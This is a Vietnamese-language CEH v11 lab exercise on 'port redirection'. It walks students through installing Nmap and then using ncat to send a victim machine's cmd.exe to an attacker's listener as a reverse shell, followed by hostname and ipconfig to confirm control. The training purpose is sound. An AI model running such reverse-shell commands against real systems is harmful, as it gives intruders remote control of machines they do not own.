Bài tập 4 – Thực hiện chuyển hướng cổng
CEH v11 Online Lab : Module 6 Malware Threat – Lab 1 Fork Bomb
CEH v11 Online Lab : Module 6 Malware Threat – Lab 2 Theo dõi việc sử dụng cổng
CEH v11 Online Lab : Module 6 Malware Threat – Lab 3 Xác định các cổng mở
Lưu ý : Các bạn hãy hoàn tất Bài tập 4 theo thời hạn yêu cầu và xuất report (cách được khuyến nghị) hoặc chụp ảnh màn hình trên plab gởi cho BQT. Nếu không thực hiện việc làm lab quá 3 bài BQT sẽ limit tài khoản , việc tuân thủ nội quy sẽ giúp cho các bạn học tập tốt hơn.
Đây là bài học và yêu cầu làm lab từ BQT
Tham gia lớp học : https://akademy.edu.vn/course/khoa-hoc-cehv11-truc-tuyen/
Bạn có thể thực hiện chuyển hướng cổng bằng cách sử dụng netcat, còn được gọi là ncat, tiện ích dòng lệnh có sẵn cho các nền tảng Linux, UNIX và Windows. Tiện ích dòng lệnh này đọc thông tin từ các kết nối sử dụng TCP hoặc UDP để thực hiện chuyển hướng cổng đơn giản.
Có hai thực thể trong quá trình chuyển hướng cổng, đó là kẻ tấn công và nạn nhân. Bước đầu tiên kẻ tấn công lắng nghe trên một cổng để gửi và nhận dữ liệu. Kẻ tấn công sẽ thả một tải trọng độc hại (payload) trên hệ thống của nạn nhân để thực hiện các lệnh cấp hệ thống và chuyển hướng lưu lượng đến cổng liên quan trên hệ thống của kẻ tấn công. Tải trọng có thể được gửi qua email, tập lệnh được tạo, tệp độc hại, v.v. Trọng tải cũng có thể được phân phối thông qua một tập lệnh hàng loạt.
Trong bài tập này, bạn sẽ thực hiện chuyển hướng cổng bằng lệnh ncat.
Kết quả học tập
Sau khi hoàn thành bài tập này, bạn sẽ có thể:
- Cài đặt Nmap
- Sử dụng Netcat để thực hiện chuyển hướng cổng
Thiết bị của bạn
Bạn sẽ sử dụng các thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn này ngay bây giờ.
- PLABDC01 – (Windows Server 2019 – Máy chủ miền)
- PLABDM01 – (Windows Server 2019 – Thành viên miền)
- PLABWIN10 – (Windows 10 – Máy trạm)

Nhiệm vụ 1 – Cài đặt Nmap
Tiện ích Netcat được tích hợp sẵn với Zenmap GUI, là phiên bản GUI của Nmap. Netcat được tạo sẵn với Zenmap được gọi là Ncat.
BQT : Ngoài ra, các bạn có thể linh động triển khai bài tập trên Parrot OS và chụp hình vẫn đáp ứng yêu cầu bài tập
Trong tác vụ này, bạn sẽ cài đặt Nmap, cũng chứa Zenmap.
Bước 1
Đảm bảo bạn đã cấp nguồn cho các thiết bị cần thiết và kết nối với PLABWIN10 .
Truy cập Intranet bằng cách khởi chạy Internet Explorer .

Bước 2
Nhấp vào Công cụ .

Bước 3
Nhấp vào nmap .

Bước 4
Nhấp vào nmap-5.51-setup.exe.

Bước 5
Trong thanh thông báo, nhấp vào Chạy .

Bước 6
Các cài đặt Nmap thuật sĩ sẽ được hiển thị. Trên trang Thỏa thuận Cấp phép , hãy nhấp vào Tôi Đồng ý .

Bước 7
Trên trang Chọn thành phần , giữ lựa chọn mặc định và nhấp vào Tiếp theo .

Bước 8
Trên trang Chọn vị trí cài đặt , giữ nguyên đường dẫn cài đặt mặc định và nhấp vào Cài đặt .

Bước 9
Trên trang Cài đặt , tiến trình cài đặt được hiển thị.

Bước 10
Trong khi cài đặt, hộp thoại Thiết lập WinPcap (Nmap) 4.1.2 sẽ hiển thị. Nó nhắc thay thế phiên bản WinPcap cũ hơn trên hệ thống. Nhấp vào Có để tiến hành thay thế.

Bước 11
Các WinPcap (Nmap) 4.1.2 Cài đặt Wizard được hiển thị. Trên trang Thỏa thuận Cấp phép , hãy nhấp vào Tôi Đồng ý .

Bước 12
Trên trang Hoàn tất Cài đặt , bấm Tiếp theo .

Bước 13
Trên trang Tùy chọn WinPcap , giữ các lựa chọn mặc định và nhấp vào Tiếp theo .

Bước 14
Trên trang Hoàn tất , bấm Kết thúc .

Bước 15
Các cài đặt Nmap thuật sĩ lại xuất hiện. Trên trang Cài đặt , tiến trình cài đặt được hiển thị.

Bước 16
Trên trang Hoàn tất Cài đặt , bấm Tiếp theo .

Bước 17
Trên trang Tạo lối tắt , giữ nguyên lựa chọn mặc định và bấm Tiếp theo .

Bước 18
Trên trang Hoàn tất , bấm Kết thúc .

Bước 19
Đóng Internet Explorer .

Nhiệm vụ 2 – Sử dụng Netcat để thực hiện chuyển hướng cổng
Trong nhiệm vụ này, thiết bị PLABDM01 sẽ là nạn nhân và thiết bị PLABWIN10 sẽ là kẻ tấn công. Hãy xem xét cổng 8080 làm ví dụ. Kẻ tấn công sẽ nghe trên cổng 8080 trên thiết bị PLABWIN10 bằng lệnh ncat . Bạn sẽ thực thi lệnh shell, là cmd.exe của nạn nhân trên thiết bị PLABDM01 , và chuyển hướng nó đến hệ thống của kẻ tấn công nơi kẻ tấn công có thể kiểm soát toàn bộ hệ thống.
Bước 1
Kết nối với PLABWIN10 .
Trong hộp văn bản Nhập vào đây để tìm kiếm , hãy nhập lệnh sau:
cmd
Từ kết quả tìm kiếm, chọn Command Prompt .

Bước 2
Cửa sổ Command Prompt mở ra.
Để thiết lập trình nghe, tại dấu nhắc, hãy nhập lệnh sau:
ncat -v -l -p 8080
Nhấn Enter .Lưu ý: Tham số “- v ” xác định chế độ tiết, chế độ này sẽ in bất kỳ thông tin bổ sung nào. Tham số “- l ” xác định “Nghe”. Tham số “- p ” xác định số cổng.

Bước 3
Các Windows Security Alert hộp thoại sẽ được hiển thị. Nhấp vào Cho phép truy cập .

Khi thực hiện lệnh, kẻ tấn công đang nghe thành công trên cổng 8080 .

Bước 4
Kết nối với PLABDM01 . Đóng cửa sổ Trình quản lý máy chủ .

Bước 5
Cảnh báo: Bạn cần cài đặt Nmap và WinPcap trên PLABDM01 theo bước tương tự như bạn đã làm trong tác vụ trước đó để cài đặt trên PLABWIN10 . Nếu không cài đặt Nmap, bạn sẽ không thể thực hiện các bước còn lại trong tác vụ này.
Để mở Command Prompt , nhấp chuột phải vào nút Start và chọn Run .

Bước 6
Các Run hộp thoại sẽ được hiển thị. Trong hộp văn bản Mở , nhập nội dung sau:
cmd
Bấm OK .

Bước 7
Cửa sổ nhắc lệnh mở ra.
Để chuyển hướng trình bao lệnh ( cmd.exe ) đến hệ thống của kẻ tấn công, PLABWIN10 , tại dấu nhắc, hãy nhập lệnh sau:
ncat 192.168.0.3 8080 -e "cmd.exe"
Lưu ý: Tham số 192.168.0.3 xác định địa chỉ IP của hệ thống kẻ tấn công. Tham số -e là viết tắt của Execute. Tham số cmd.exe là viết tắt của Command Shell.
Tải trọng trên thiết bị nạn nhân được thực thi và lưu lượng truy cập được chuyển hướng đến cổng 8080 trên hệ thống của kẻ tấn công với địa chỉ IP 192.168.0.3, đó là thiết bị PLABWIN10 .

Bước 8
Chuyển về PLABWIN10 .
Kẻ tấn công lấy lệnh shell của nạn nhân trên cửa sổ lắng nghe. Lệnh Shell ( cmd.exe ) từ nạn nhân được chuyển hướng thành công đến hệ thống của kẻ tấn công.

Bước 9
Để xác minh xem kẻ tấn công có hoàn toàn kiểm soát shell lệnh của hệ thống nạn nhân hay không, trong cửa sổ Command Prompt trên thiết bị PLABWIN10 , tại dấu nhắc, hãy nhập lệnh sau:
hostname
Nhấn Enter .

Bước 10
Tên máy chủ “ PLABDM01 ” được hiển thị dưới dạng đầu ra lệnh. Điều này cho thấy kẻ tấn công ( PLABWIN10 ) hoàn toàn kiểm soát thiết bị của nạn nhân ( PLABDM01 ).

Bước 11
Bây giờ kẻ tấn công hoàn toàn kiểm soát hệ thống của nạn nhân và có thể thực hiện bất kỳ hành động nào mong muốn như duyệt tệp, tạo cửa sau liên tục, v.v.
Để hiển thị cấu hình IP của thiết bị nạn nhân ( PLABDM01 ), trong cửa sổ Command Prompt trên thiết bị PLABWIN10 , tại dấu nhắc, hãy nhập lệnh sau:
ipconfig
Nhấn Enter .

Bước 12
Lệnh hiển thị chi tiết cấu hình IP của thiết bị PLABDM01 .

Nhấp vào nút để chụp ảnh màn hình PLABDM01 . Đóng tất cả các cửa sổ đang mở.
Sau khi hoàn tất các bài trên Security365 Practice Labs các bạn có thể thực hiện tiếp phần lab của CEH v11 Lab Guide, lưu ý không làm CEH v11 Lab Guide khi chưa hoàn tất Practice Onlien Labs. Nếu không BQT sẽ không hồi đáp hay support nếu thực hành không theo lộ trình đặt ra.